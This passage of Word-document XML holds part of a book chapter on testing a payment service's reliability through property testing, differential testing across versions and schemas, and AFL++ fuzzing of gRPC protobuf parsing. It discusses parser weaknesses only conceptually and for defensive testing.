        <w:t xml:space="preserve">Property testing becomes executable business rule documentation that prevents regression. As your payment service evolves and adds features, properties ensure that new functionality doesn’t violate existing business constraints.</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="153"/>
    <w:bookmarkStart w:id="154" w:name="Xdd5e24573ab9c8b5b0927fc041683953e71762c"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Advanced Property Patterns for Financial Services</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Financial services present particularly complex property verification challenges due to regulatory compliance requirements, multi-currency handling, and precision arithmetic constraints. Your payment service must maintain mathematical correctness under all conditions while satisfying legal and business requirements that change over time.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Consider currency conversion accuracy properties. Exchange rates fluctuate constantly, but conversion calculations must maintain precision requirements and comply with financial regulations. A property might verify: "converted amounts never deviate from regulatory precision requirements," or "conversion rates applied consistently across all transactions in the same batch."</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Tax calculation represents another complex property verification scenario. Tax rules vary by jurisdiction, customer type, product category, and transaction timing. Manual testing might verify tax calculation for a few scenarios, but property testing can systematically explore the combination space that causes compliance failures.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Build properties that verify tax calculation correctness across jurisdiction boundaries, customer classifications, and product combinations. Generate realistic transaction scenarios that stress tax logic with edge case amounts, mixed-jurisdiction orders, and complex product categorizations.</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="154"/>
    <w:bookmarkStart w:id="155" w:name="X35d92c939c2dcf37b96dacd7ad6a7577f332d2e"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Property Testing for Fraud Detection Logic</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Fraud detection systems contain sophisticated business logic that must balance security with customer experience. False positives block legitimate transactions, causing customer frustration. False negatives allow fraudulent transactions, causing financial losses. Property testing can verify that fraud detection maintains this balance under systematic exploration.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Define properties that verify fraud detection behavior: "legitimate transaction patterns never trigger false positive alerts," "known fraud patterns always trigger appropriate security measures," "fraud detection decisions remain consistent for identical transaction characteristics."</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Generate transaction patterns that represent both legitimate customer behavior and known fraud indicators. Systematic exploration discovers the boundary conditions where fraud detection logic fails: legitimate transactions that accidentally match fraud patterns, or sophisticated fraud attempts that bypass detection rules.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Property testing for fraud detection requires careful balance between security and transparency. You want comprehensive verification without exposing fraud detection logic details that could enable attack development.</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="155"/>
    <w:bookmarkStart w:id="156" w:name="X0ddc9a25f562bee75ab22482482f74b6485631b"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Performance Properties and Resource Management</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Business logic correctness includes performance characteristics that affect customer experience. Payment processing that takes too long frustrates customers. Resource consumption that grows without bounds causes service degradation. Property testing can verify performance characteristics as rigorously as functional correctness.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Define performance properties for your payment service: "payment processing completes within acceptable time limits regardless of load," "memory consumption remains bounded during high-volume transaction processing," "database connections are released appropriately after transaction completion."</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Generate load scenarios that stress performance boundaries: concurrent transaction processing, large batch operations, sustained high-volume periods, and resource contention conditions. Property testing discovers performance edge cases that cause customer experience degradation even when functional logic remains correct.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Performance property testing requires careful instrumentation and measurement. You need accurate timing measurement, resource usage monitoring, and threshold verification that accounts for system variability while catching genuine performance problems.</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="156"/>
    <w:bookmarkEnd w:id="157"/>
    <w:bookmarkStart w:id="163" w:name="X6d9fcb4b79de4aca07e5fb7ddb423892acd0eac"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Differential Testing: Ensuring Consistency During Service Evolution</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Your property testing now catches business logic failures in your current payment service. But what happens when "new functionality" means deploying an entirely new version of your service? You’ve solved the duplicate payment problem with property testing, but now you face a different challenge: ensuring that your fix works consistently across service updates.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Picture this scenario: your property testing catches the duplicate payment bug, your team implements a fix, and comprehensive testing validates the solution. You deploy v2.0 of your payment service with confidence—​only to discover that the new version handles promotional discount codes differently than v1.9, causing customer complaints about inconsistent pricing during your staged rollout.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">This scenario illustrates why property testing alone isn’t sufficient for service reliability. You need differential testing to ensure that service changes maintain behavioral consistency for scenarios that matter to customers. Business logic might be correct in isolation but differ between implementations in ways that break customer expectations.</w:t>
      </w:r>
    </w:p>
    <w:bookmarkStart w:id="158" w:name="X5d0bc2a63e885a2c36813221cc6e3c4b515152f"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Preventing Version Inconsistencies in 20 Minutes</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Here’s the specific problem: v1.9 calculated a 10% student discount by applying it before tax calculation, while v2.0 applies the same discount after tax calculation. Both approaches seem reasonable during code review. Both pass individual testing. But customers comparing receipts notice different final amounts for identical orders, leading to support tickets and refund requests.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Differential testing extends your property testing approach to compare service behavior across versions. Instead of just verifying that new code satisfies business properties with FuzzTest, you verify that new and old code produce identical results for the same inputs—​or flag meaningful differences for review before they affect customers.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">This harness reuses your payment scenario generation from property testing. The same realistic payment requests that verified business logic correctness now ensure consistency across service versions. When outputs differ, you’ve discovered a behavioral change that might affect customer experience—​before customers encounter pricing inconsistencies.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">The Docker approach makes version comparison straightforward. Your containers already run the current service version for property testing—​now you’ll run old and new versions simultaneously with identical inputs. You can typically set up systematic detection of service behavior changes in 20-30 minutes—​changes that would take manual testing much longer to discover thoroughly.</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="158"/>
    <w:bookmarkStart w:id="159" w:name="Xaaddddf7ca0c306feb8e35dc250bd7821d54373"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Understanding Meaningful vs. Acceptable Differences</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">The challenge with differential testing lies in distinguishing meaningful behavioral changes from acceptable implementation variations. Not all differences indicate problems—​some represent intentional improvements, performance optimizations, or acceptable implementation choices.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Build intelligent difference detection that focuses on customer-visible behavior rather than internal implementation details. Payment processing timing differences might be acceptable if response times remain within service level agreements. Database query optimization that changes internal execution plans but produces identical results should not trigger alerts.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Configure difference detection rules based on business impact assessment. Currency amount differences of more than one cent indicate serious problems. Response format changes that break client parsing represent integration failures. Performance degradation beyond acceptable thresholds signals service quality issues.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Document acceptable difference patterns to reduce false positive alerts. New service versions might include additional response fields that don’t affect existing clients. Logging format changes might alter debug output without affecting business functionality. Internal timing optimizations might change execution order without affecting correctness.</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="159"/>
    <w:bookmarkStart w:id="160" w:name="Xb329959159505198c97c5ac607f59d0052aa462"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">API Compatibility and Contract Testing</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Service evolution often involves API changes that must maintain backward compatibility for existing clients. Your payment service might add new JSON fields, modify response structures, or change error handling behavior in ways that break client integration expectations.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Build differential API testing that verifies client-visible behavior remains consistent even when internal implementation changes significantly. Generate realistic API request patterns and verify that response formats, error codes, and timing behavior remain compatible across service versions.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">This testing prevents the integration failures that cause cascading service outages. When your payment service API changes break client assumptions about response formats or error handling, dependent services start failing in ways that are difficult to debug. For example, if v2.0 returns HTTP 422 for invalid payment methods while v1.9 returned HTTP 400, client services expecting 400-level errors for retries might handle 422 differently, causing unexpected failure behaviors.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">API compatibility testing requires understanding client usage patterns. Different clients might use different subsets of your API, have varying error handling sophistication, and make different assumptions about response timing and formats. Generate test scenarios that represent actual client usage rather than theoretical API coverage.</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="160"/>
    <w:bookmarkStart w:id="161" w:name="X8f6f1ec61e815b324b087aa5e81eb312a454eef"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Database Migration Compatibility Verification</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Database schema changes present critical differential testing opportunities that often get overlooked until production deployment reveals compatibility issues. Your application must work correctly with both old and new database schemas during migration periods, and data transformations must maintain consistency across schema boundaries.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Consider a payment service database migration that normalizes transaction data storage. The old schema stores transaction amounts as decimal strings in a single table. The new schema stores amounts as integer cents with separate currency metadata tables. Both schemas must produce identical results for customer queries during the migration period.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Build differential testing that validates every data operation across schema boundaries: transaction storage, query retrieval, aggregation calculations, and reporting functionality. Generate realistic data access patterns that stress schema conversion logic and verify that business calculations remain consistent.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Database differential testing must account for performance differences between schema designs. New schemas might execute queries faster or slower than old schemas, but functional results must remain identical. Migration logic must handle edge cases like partial data transformation, rollback scenarios, and concurrent access during schema transitions.</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="161"/>
    <w:bookmarkStart w:id="162" w:name="Xd3baf7edb068a1c379dcf380a2a47c2dc63c623"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Configuration and Environment Consistency</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Service configuration changes create subtle behavioral differences that differential testing can catch before they affect production reliability. Environment-specific configuration values, feature flags, and deployment parameters can cause services to behave differently in ways that break customer expectations.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Your payment service might use different fraud detection thresholds in different environments, different external service endpoints for payment processing, or different timeout values for downstream dependencies. Differential testing can verify that configuration changes don’t introduce unexpected behavioral differences.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Generate test scenarios that exercise configuration-dependent behavior: fraud detection with various threshold settings, payment processing with different provider configurations, and timeout handling with various limit values. Verify that configuration changes affect only intended behavior while maintaining consistency for unrelated functionality.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Configuration differential testing becomes particularly important during infrastructure migrations. Moving services between cloud providers, upgrading runtime environments, or changing deployment platforms can introduce subtle behavioral changes through configuration drift or environment differences.</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="162"/>
    <w:bookmarkEnd w:id="163"/>
    <w:bookmarkStart w:id="169" w:name="Xff1cc190613aba2fff85485b42f0ac6bd0d929a"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Protocol-Level Reliability: Extending Binary Fuzzing to Service Communication</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Your service maintains business logic correctness through property testing and behavioral consistency through differential testing. Yet last week, your monitoring alerts fired: "Payment service experiencing intermittent crashes during high load." The crashes weren’t happening during normal operation—​only when your inventory service sent unusually large product catalogs through gRPC during bulk updates.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Investigation revealed that your gRPC protobuf parsing logic had a buffer overflow bug triggered by messages exceeding 4MB. The bug never appeared during property testing (which used realistic payment amounts) or differential testing (which compared identical small inputs). But it caused production outages when real-world usage patterns generated edge case protobuf messages.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">gRPC protocol handling represents a similar reliability challenge to file format parsing from Chapter 1, just applied to network communication. Protobuf messages are structured binary data that services must parse correctly. Malformed protobuf messages can crash services, cause infinite loops, or trigger resource exhaustion—​similar failure modes to those you’ve already addressed for file inputs.</w:t>
      </w:r>
    </w:p>
    <w:bookmarkStart w:id="164" w:name="X8397c0a07295cbc9ce8b7b0e08d329fcb0b83fd"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Applying Binary Fuzzing to gRPC Communication in 25 Minutes</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Your payment service accepts protobuf payment requests through gRPC endpoints. These endpoints represent attack surfaces similar to the file parsers you’ve already secured with AFL++, but with an important difference: instead of malformed files on disk, you’re dealing with malformed network messages that arrive during normal service operation.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Protocol buffer messages follow a specific binary encoding format: field numbers, wire types, length prefixes, and variable-length encoding for integers. Just like file formats, this structure creates parsing opportunities where malformed data can trigger crashes, infinite loops, or resource exhaustion. The key insight: you can adapt your AFL++ binary fuzzing expertise to generate malformed protobuf messages that stress gRPC parsing logic.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">This approach builds directly on your AFL++ expertise from Chapter 1. Instead of fuzzing file parsers with malformed input files, you’re fuzzing gRPC endpoints with malformed protobuf messages. The same coverage-guided exploration discovers parsing edge cases that cause service crashes or resource exhaustion during network communication.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">You can typically set up automated discovery of gRPC-specific reliability issues in 25-35 minutes—​issues that traditional HTTP endpoint testing often misses. Protobuf parsing failures often cause different crash patterns than JSON parsing failures, requiring protocol-specific fuzzing to discover thoroughly.</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="164"/>
    <w:bookmarkStart w:id="165" w:name="Xec36f3e9feb39218ff9790c12b8b80f67402293"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Understanding Protobuf Vulnerability Patterns</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Protobuf parsing vulnerabilities follow predictable patterns that systematic fuzzing can exploit effectively. Understanding these patterns helps you design more effective fuzzing campaigns and interpret results more accurately when crashes occur.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Length prefix manipulation represents a primary attack surface in protobuf parsing. Messages contain length fields that specify how much data to read for variable-length fields like strings and bytes. Malformed length values can cause buffer overruns, infinite loops, or memory exhaustion when parsers attempt to allocate excessive memory.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Nested message depth bombing creates another common vulnerability pattern. Protobuf messages can contain nested submessages that create recursive parsing logic. Deeply nested structures can cause stack overflow crashes or exponential memory consumption when parsers process them recursively without depth limits.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Field number conflicts and wire type mismatches cause subtle parsing errors that might not crash immediately but corrupt message interpretation. These issues can cause business logic failures when services process corrupted protobuf data that appears syntactically valid but contains semantically incorrect field assignments.</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="165"/>
    <w:bookmarkStart w:id="166" w:name="Xc9951ffaff30021fc3e865b863dc825af3d1dcc"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">gRPC Streaming Protocol Reliability</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">gRPC streaming introduces additional protocol complexity beyond unary request-response patterns. Client streams, server streams, and bidirectional streams require careful resource management, flow control, and connection lifecycle handling that can fail under adversarial conditions.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Generate streaming scenarios that stress connection limits, message ordering, and backpressure handling. Create clients that establish many concurrent streams, send messages faster than servers can process them, and disconnect unexpectedly during stream processing.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Bidirectional streaming adds complexity by requiring coordination between client and server message flows. Generate scenarios where client and server streams operate at different rates, where messages arrive out of order, and where stream termination happens at unexpected times during payment processing workflows.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Flow control testing ensures that streaming services handle backpressure gracefully without consuming unbounded resources. Generate scenarios where message production exceeds consumption capacity and verify that services maintain stability rather than exhausting memory or connections during high-volume payment processing.</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="166"/>
    <w:bookmarkStart w:id="167" w:name="Xa59dc1d3e030d3540c2959cd718c5e98d8f9fbd"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Protocol State Management and Connection Handling</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">gRPC services maintain connection state across multiple requests, creating additional reliability challenges around connection lifecycle management, authentication persistence, and graceful degradation under connection failures.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Connection pool exhaustion represents a common failure mode when services don’t manage gRPC connections appropriately. Generate scenarios that stress connection limits, test connection reuse logic, and verify that services handle connection failures gracefully without affecting unrelated request processing.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Authentication state persistence across gRPC connections requires careful testing to ensure that authentication failures don’t cascade across multiple services. Generate scenarios where authentication tokens expire during active connections, where authentication services become temporarily unavailable, and where connection authentication needs refreshing.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Service mesh integration adds additional protocol complexity through load balancing, circuit breaking, and retry logic that can interact poorly with gRPC streaming and connection management. Test scenarios where service mesh components introduce delays, connection failures, and request routing changes during active gRPC sessions.</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="167"/>
    <w:bookmarkStart w:id="168" w:name="X6f351bb6cc7271a93f6397513efad51301387ed"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Combining Protocol Fuzzing with Property Verification</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">The most sophisticated reliability failures occur when protobuf messages parse successfully but violate business logic constraints. A malformed payment request might deserialize correctly but contain payment amounts that cause integer overflow in business calculations, potentially bypassing both protocol validation and business rule enforcement.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Extend your property testing to cover protobuf message edge cases that combine protocol parsing with business logic verification. Generate protobuf messages that parse successfully but contain edge case values designed to stress business logic implementation.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">This combined approach discovers the subtle reliability failures that occur at protocol-business logic boundaries. Consider this scenario: a malformed protobuf payment request contains a negative payment amount encoded as a positive varint due to two’s complement overflow. The protobuf parsing succeeds (the varint is valid), but business logic receives an unexpected positive value for what should be a negative number, potentially bypassing fraud detection rules.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Services might handle malformed protobuf messages correctly in isolation. They might enforce business rules perfectly for normal inputs. But when edge case protocol inputs interact with business logic in unexpected ways, you get the reliability failures that are hardest to debug and most damaging to customer trust.</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="168"/>
    <w:bookmarkEnd w:id="169"/>
    <w:bookmarkStart w:id="175" w:name="Xac48f86e97901605dbef2ee80608a1e84398f4e"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Integrating Advanced Techniques for Comprehensive Service Reliability</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Now you’ve established three powerful reliability testing approaches, each addressing different failure modes. But the real power emerges when you combine them strategically. Consider what you’ve built: property testing catches business logic violations, differential testing ensures behavioral consistency, and protocol testing discovers communication failures. Each technique works excellently in isolation, but your payment service benefits most when all three work together as a coordinated reliability verification system.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">The key insight: advanced reliability testing techniques work best when applied together rather than in isolation. Property testing discovers business logic edge cases, differential testing ensures those edge cases behave consistently across service versions, and protocol testing verifies that edge cases don’t cause communication failures.</w:t>
      </w:r>
    </w:p>
    <w:bookmarkStart w:id="170" w:name="X740cbdf9eacca2edb29622bf7f5b0ad10cc8556"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Building Your Comprehensive Reliability Testing Suite</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Integrate all three techniques into a unified testing approach that systematically explores your service’s reliability boundaries. Use property testing to define business correctness constraints, differential testing to verify consistency across implementations, and protocol testing to ensure communication robustness.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">This integration provides layered reliability verification that can catch failures at multiple levels. Protocol fuzzing can discover parsing crashes that would cause immediate service outages. Property testing can catch business logic violations that would corrupt customer data. Differential testing can prevent behavioral inconsistencies that would break client integrations during deployments.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">The Docker orchestration approach scales this comprehensive testing without infrastructure complexity. The same containers that executed individual techniques now coordinate comprehensive reliability campaigns that provide much higher confidence in service reliability than any single technique alone.</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="170"/>
    <w:bookmarkStart w:id="171" w:name="Xc391f40c91e9a1c8540c900d7c3157f91416f8d"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Coordinating Test Execution and Resource Management</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Running multiple advanced testing techniques simultaneously requires careful resource coordination to avoid overwhelming your testing infrastructure while maximizing discovery effectiveness. Different techniques have different resource requirements, execution patterns, and result generation characteristics.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Property testing with FuzzTest typically requires CPU-intensive exploration with moderate memory usage. Protocol fuzzing needs network bandwidth and connection handling capacity. Differential testing requires running multiple service instances simultaneously, doubling memory and CPU requirements for comparison scenarios.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
